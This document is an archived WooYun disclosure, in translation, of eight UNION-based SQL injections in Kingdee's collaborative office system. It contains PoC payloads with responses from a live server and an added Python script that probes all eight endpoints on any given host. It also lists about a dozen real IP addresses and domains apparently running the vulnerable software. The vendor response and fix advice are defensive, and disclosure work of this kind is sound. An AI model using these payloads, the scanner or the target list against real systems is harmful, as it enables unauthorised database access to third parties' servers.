WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
Disclosure timeline:
2015-08-26: Details reported to the vendor, awaiting vendor handling
2015-08-26: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details opened to third-party security partners
2015-10-20: Details opened to core white hats and domain experts
2015-10-30: Details opened to ordinary white hats
2015-11-09: Details opened to intern white hats
2015-11-24: Details disclosed to the public

Eight high-severity SQL injections in Kingdee's collaborative office system
The vulnerable files are the following; in every one of them data can be pulled directly with UNION SELECT:
/kingdee/tree/tree/announce/get_nodes.jsp?node=1
/kingdee/tree/tree/announce/get_selected.jsp?ids=1
/kingdee/tree/tree/discuss/get_nodes.jsp?node=1
/kingdee/tree/tree/discuss/get_selected.jsp?ids=1
/kingdee/tree/tree/news/get_nodes.jsp?node=1
/kingdee/tree/tree/news/get_selected.jsp?ids=1
/kingdee/tree/tree/rules/get_nodes.jsp?node=1
/kingdee/tree/tree/rules/get_selected.jsp?ids=1
Vulnerability PoC (the second payload opens with ")" because the ids value is spliced into a parenthesised clause that has to be closed before the UNION; @@version returning a banner confirms the backend is Microsoft SQL Server):
/get_nodes.jsp?node=1 union select NULL,@@version--
/get_selected.jsp?ids=1) union select NULL,@@version--
There are very many instances; one is used here as proof.
get_nodes.jsp:
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--
Response (the injected @@version row is returned as a tree node, in both the text and announce_name fields):
[{"id":"","text":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n","announce":"","leaf":false,"node_type":"0","announce_name":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n"},]
get_selected.jsp:
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_selected.jsp?ids=1) union select NULL,@@version--
Response (the injected row comes back ahead of the legitimate row [1,'公司公告']):
[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]
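The PoC and the two response shapes above, turned into a small checker. This is an added example, not code from the report or from Kingdee: the paths, the two payloads and the sample response bodies are the ones shown on this page (the get_nodes body abridged), while the base URL given on the command line is an assumption. It URL-encodes each payload for all eight endpoints and recognises a successful injection by the MSSQL @@version banner echoed back in the response.

```python
"""Checker for the two UNION-injection PoCs in the report above.

Added example, not part of the original WooYun report. The payloads, paths
and SAMPLE_* bodies come from the report; the host passed to main() is an
assumption. Run only against systems you are authorised to test.
"""
from __future__ import annotations

import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# The four tree modules listed in the report, each exposing the same two scripts.
MODULES = ("announce", "discuss", "news", "rules")

# script -> (parameter, payload). Payloads are the report's PoC verbatim. The
# get_selected payload starts with ")" because `ids` lands inside a parenthesised
# clause that must be closed before the UNION is appended.
PROBES = {
    "get_nodes.jsp": ("node", "1 union select NULL,@@version--"),
    "get_selected.jsp": ("ids", "1) union select NULL,@@version--"),
}

# Leading part of the @@version banner of any Microsoft SQL Server release.
VERSION_RE = re.compile(r"Microsoft SQL Server \d{4} - \d+(?:\.\d+)+")

# Response bodies copied from the report (get_nodes abridged); used offline.
SAMPLE_GET_NODES = (
    r'[{"id":"","text":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\t'
    r'Nov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation'
    r'\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n",'
    r'"announce":"","leaf":false,"node_type":"0"},]'
)
SAMPLE_GET_SELECTED = (
    "[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 "
    "Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on "
    "Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]"
)


def build_url(base: str, module: str, script: str) -> str:
    """URL-encode the PoC payload for one module/script pair."""
    param, payload = PROBES[script]
    query = urllib.parse.urlencode({param: payload})
    return f"{base.rstrip('/')}/kingdee/tree/tree/{module}/{script}?{query}"


def all_urls(base: str) -> list[str]:
    """The eight probe URLs for one host, in the order the report lists them."""
    return [build_url(base, m, s) for m in MODULES for s in PROBES]


def leaked_version(body: str) -> str | None:
    """Return the injected @@version banner if the UNION row was echoed back.

    Neither response is valid JSON (get_nodes has a trailing comma, get_selected
    is a JavaScript array literal with an empty element), so the body is scanned
    as text instead of being parsed.
    """
    m = VERSION_RE.search(body)
    return m.group(0) if m else None


def probe(base: str, timeout: float = 10.0) -> dict[str, str | None]:
    """Fetch each probe URL and map it to the leaked banner (None = no hit).

    A network error is recorded as None so one dead module does not abort the run.
    """
    results: dict[str, str | None] = {}
    for url in all_urls(base):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except (urllib.error.URLError, OSError):
            results[url] = None
            continue
        results[url] = leaked_version(body)
    return results


if __name__ == "__main__":
    # Offline check against the report's own responses.
    for body in (SAMPLE_GET_NODES, SAMPLE_GET_SELECTED):
        print("leaked:", leaked_version(body))
    # Live check when a base URL such as http://host:8080 (assumed) is given.
    if len(sys.argv) > 1:
        for url, ver in probe(sys.argv[1]).items():
            print("VULNERABLE" if ver else "no hit", url, ver or "")
```

The banner match is deliberately loose (any "Microsoft SQL Server YYYY - x.y.z.w") so the checker works against servers newer than the 2005 instance in the report; a response that contains only the legitimate rows yields None.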
A few more instances:
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp
Fix suggestion: filter the node and ids parameters. Both carry numeric identifiers, so rejecting anything other than digits (and commas for ids), or binding the values as query parameters instead of concatenating them into the SQL, closes the injection.
Vendor response:
Severity: Low
Vulnerability Rank: 1
Confirmed: 2015-08-26 11:35
Vendor reply: Thank you for your attention to Kingdee. This product is a partner's product; we have notified the relevant department to fix it for customers. Many vulnerabilities in this system have already been reported, so the rank given is low; please understand.
Latest status: none yet.